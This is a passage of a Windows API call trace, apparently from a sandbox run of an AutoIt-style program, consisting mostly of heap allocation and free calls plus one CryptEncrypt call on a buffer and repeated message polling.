Flags=0x0, Size=0x8) returned 0x2e54fb8 [0225.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0225.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0225.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0225.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0225.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x2317) returned 0x2f16b38 [0225.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0225.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f16b38 | out: hHeap=0x970000) returned 1 [0225.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0225.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0225.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0225.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0225.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0225.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0225.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0225.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0225.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x978490 [0225.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0225.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0225.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0225.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0225.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0225.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0225.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699a8 [0225.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0225.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0225.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0225.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0225.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0225.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0225.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0225.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0225.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0225.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0225.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0225.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0225.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0225.813] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0225.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0225.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0225.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0225.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0225.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0225.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0225.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0225.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0225.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0225.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0225.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0225.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0225.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0225.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0225.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0225.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0225.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0225.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0225.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0225.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0225.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0225.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0225.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0225.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0225.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0225.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0225.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0225.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0225.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0225.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0225.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0225.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0225.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0225.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0225.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0225.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0225.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0225.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0225.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0225.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0225.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0225.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0225.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0225.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0225.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0225.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f800 [0225.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0225.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0225.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0225.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0225.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0225.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0225.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0225.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0225.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0225.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0225.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0225.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0225.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0225.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0225.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0225.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0225.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0225.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0225.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0225.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0225.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0225.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0225.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0225.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0225.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0225.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0225.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0225.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0225.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0225.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0225.816] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0225.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e51358 [0225.816] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51358, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0225.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0225.816] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0225.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0225.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0225.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e7f440 [0225.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0225.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0225.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0225.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0225.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0225.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0225.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55228 [0225.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0225.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0225.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0225.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0225.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0225.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0225.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55228 | out: hHeap=0x970000) returned 1 [0225.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f440 | out: hHeap=0x970000) returned 1 [0225.845] CryptEncrypt (in: hKey=0xa87550, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f14818*, pdwDataLen=0x8cef60*=0x2317, dwBufLen=0x2318 | out: pbData=0x2f14818*, pdwDataLen=0x8cef60*=0x2318) returned 1 [0225.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978518 [0225.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f440 [0225.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55208 [0225.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0225.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0225.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0225.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55218 [0225.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0225.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55218 | out: hHeap=0x970000) returned 1 [0225.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0225.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0225.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0225.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0225.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552f8 [0225.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0225.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552f8 | out: hHeap=0x970000) returned 1 [0225.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0225.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0225.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0225.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0225.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551e8 [0225.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0225.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551e8 | out: hHeap=0x970000) returned 1 [0225.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0225.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0225.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0225.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0225.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55148 [0225.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0225.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55148 | out: hHeap=0x970000) returned 1 [0225.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0225.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0225.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0225.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0225.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55188 [0225.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0225.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55188 | out: hHeap=0x970000) returned 1 [0225.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0225.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0225.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0225.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0225.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55278 [0225.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0225.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55278 | out: hHeap=0x970000) returned 1 [0225.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0225.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699c8 [0225.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977998 [0225.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0225.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55238 [0225.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0225.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0225.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0225.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552a8 [0225.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0225.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552a8 | out: hHeap=0x970000) returned 1 [0225.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0225.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0225.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0225.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0225.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55158 [0225.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0225.848] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0225.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55268 [0225.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55198 [0225.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e552e8 [0225.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0225.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55298 [0225.848] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0225.848] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0225.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e552e8 [0225.848] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0225.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0225.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0225.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0225.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0225.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0225.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0225.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0225.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0225.849] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0225.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0225.849] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0225.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0225.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0225.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0225.849] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0225.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f418 [0225.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0225.849] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0225.849] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0225.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f041c0 [0225.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0225.849] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0225.849] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0225.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0225.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0225.849] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0225.849] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0225.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0225.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f045e8 [0225.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0225.850] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0225.850] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0225.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0225.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 